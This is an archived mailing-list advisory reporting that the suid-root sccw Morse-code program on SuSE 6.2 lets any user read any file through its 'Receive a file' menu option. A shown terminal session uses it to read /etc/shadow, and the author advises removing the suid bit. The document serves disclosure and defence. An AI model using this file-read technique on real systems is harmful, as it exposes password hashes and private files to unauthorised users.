Greetings,
/usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to
read any file on the system. Sort of. Well, it's enough to read the
text of almost anything. In capitals. Without punctuation. Check it
out:
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > sccw
==========================================================
Soundcard CW for Linux v1.1 Steven J. Merrifield, VK3ESM
==========================================================
1. Set the speed, currently = 10
2. Set the frequency, currently = 700
3. Set the volume, currently = 32
4. Set the delay value, currently = 3
5. Set the character set for random groups, currently = 1
6. Set the number of groups, currently = 5
7. Receive random character groups.
8. Receive a file.
9. QUIT
==========================================================
Enter your choice : 8
Enter filename : /etc/shadow
ROOTFGPZNZWZ5GWRG10850010000
BIN8902010000
DAEMON8902010000
... etc.
The printing of these lines takes a few seconds each, so be patient.
While you're waiting, remove the suid-bit.
Of course, getting the /etc/shadow file in all caps isn't instant root,
but it's a start for someone out there. Besides, he can still read your
mail in all caps, without punctuation.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:24 PDT